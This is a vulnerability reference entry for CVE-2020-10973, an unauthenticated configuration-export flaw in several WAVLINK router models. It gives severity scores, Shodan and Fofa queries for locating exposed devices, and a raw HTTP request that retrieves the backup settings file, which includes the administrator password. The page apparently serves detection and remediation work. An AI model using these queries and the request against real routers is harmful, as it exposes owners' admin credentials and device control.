🔙 목록으로 돌아가기

CVE-2020-10973: WAVLINK - Access Control

TitleWAVLINK - Access Control
Authorarafatansari
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected device.
RemediationApply the latest firmware update provided by the vendor to fix the access control issue.
CVSS Score7.5
EPSS Score0.37103
CVE IDCVE-2020-10973
CWE IDCWE-306
Shodan Queryhttp.html:"Wavlink"http.html:"wavlink"
Fofa Querybody="wavlink"
Tags cve cve2020 exposure wavlink vuln

🔍 Vulnerability Description

Wavlink WN530HG4, WN531G3, WN533A8, and WN551K are susceptible to improper access control via /cgi-bin/ExportAllSettings.sh, where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.

🌐 HTTP Request

GET /backupsettings.dat HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-10973.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-10973.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A